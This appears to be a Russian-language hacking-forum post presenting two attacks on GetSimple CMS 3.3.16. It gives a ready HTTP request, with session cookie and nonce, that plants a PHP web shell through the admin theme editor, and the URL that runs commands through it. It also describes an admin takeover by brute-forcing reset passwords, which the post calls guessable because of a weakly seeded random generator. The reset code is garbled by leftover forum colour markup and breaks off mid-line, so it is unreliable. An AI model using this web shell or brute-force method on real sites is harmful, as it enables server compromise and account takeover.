| Baskin-Robbins |
24.05.2021 01:59 |
Сайт - get-simple.info
Версия 3.3.16
RCE
Зависимости:
-- доступ в админ панель
Штатная возможность редактирования PHP-файлов шаблонов и создания новых файлов.
Можно внедрить наш бэкдор в используемый файл шаблона или залить свой скрипт.
admin/theme-edit.php
PHP код:
if ((isset($_POST['submitsave']))) {
    // CSRF guard: skipped only when the GSNOCSRF constant is defined and truthy.
    if (!defined('GSNOCSRF') || (GSNOCSRF == FALSE)) {
        $nonce = $_POST['nonce'];
        if (!check_nonce($nonce, "save")) {
            die("CSRF detected!");
        }
    }

    // Target path is GSTHEMESPATH . $_POST['edited_file']. The file name comes
    // straight from the request; nothing in this block restricts it to the
    // themes directory or to a particular extension.
    // NOTE(review): confirm whether theme-edit.php validates 'edited_file'
    // before this point.
    $SavedFile = $_POST['edited_file'];

    // Undo magic-quotes escaping on runtimes that still have it enabled
    // (get_magic_quotes_gpc() was removed in PHP 8.0).
    if (get_magic_quotes_gpc()) {
        $FileContents = stripslashes($_POST['content']);
    } else {
        $FileContents = $_POST['content'];
    }

    // Mode 'w' truncates an existing file and creates a missing one, so this
    // handler both overwrites and creates template files.
    $fh = fopen(GSTHEMESPATH . $SavedFile, 'w') or die("can't open file");
    fwrite($fh, $FileContents);
    fclose($fh);

    // Status message for the admin UI; presumably read later in the page.
    $success = sprintf(i18n_r('TEMPLATE_FILE'), $SavedFile);
}
Запрос:
Код:
POST /admin/theme-edit.php?t=Innovation&f=template.php HTTP/1.1
Host: getsimple.localhost.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://getsimple.localhost.com/admin/theme-edit.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
DNT: 1
Connection: close
Cookie: PHPSESSID=9l7pual53vbi1opd9meggoc27a; GS_ADMIN_USERNAME=admin; 5a061daedaddfec9e0820c8dce27a6de1c13955d=116ff4110b64f75d4aff43dc1e8d03994ca2205c
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
nonce=d6905d38e91254022db24285cdd5598b82a0376f&content=%3C%3Fphp+echo+shell_exec($_GET['a']);+%3F%3E&edited_file=Innovation%2Ftemplate1.php&submitsave=Save+Changes
Код:
http://getsimple.localhost.com/theme/Innovation/template1.php?a=ls
Auth bypass
Зависимости:
-- Необходимо знать/угадать логин админа
Восстанавливаем пароль -> брутим его. Пароль всегда будет в нашем списке из 1кк: судя по srand((double)microtime()*1000000) в createRandomPassword(), сид генератора принимает не более ~10^6 значений.
Более подробно - /threads/483845/
Уязвимый код:
admin/resetpassword.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#FF8000"]# create new random password [/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]createRandomPassword[/COLOR][COLOR="#007700"](); [/COLOR][COLOR="#FF8000"]// $random = '1234'; # create backup [/COLOR][COLOR="#0000BB"]createBak[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSBACKUSERSPATH[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#FF8000"]# create password change trigger file [/COLOR][COLOR="#0000BB"]$flagfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]".xml.reset"[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$flagfile[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#FF8000"]# change password and resave xml file [/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]PWD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]passhash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]XMLsave[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]); 
[/COLOR][COLOR="#FF8000"]# send the email with the new password [/COLOR][COLOR="#0000BB"]$subject[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$site_full_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESET_PASSWORD'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ATTEMPT'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$SITENAME[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESET_PASSWORD'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ATTEMPT'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'LABEL_USERNAME'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]": "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'NEW_PASSWORD'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]": "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; 
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'EMAIL_LOGIN'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]': '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$SITEURL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GSADMIN[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]exec_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'resetpw-success'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sendmail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$EMAIL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$subject[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]); [/COLOR][/COLOR]
admin/inc/template_functions.php
[COLOR="#000000"] functioncreateRandomPassword() {
$chars="Ayz23mFGHBxPQefgnopRScdqrTU4CXYZabstuDEhijkIJKMNV Wvw56789";
srand((double)microtime()*1000000);
$i=0;
$pass='';
while ($i[COLOR="#007700"]
Снаружи все это выглядит вот так: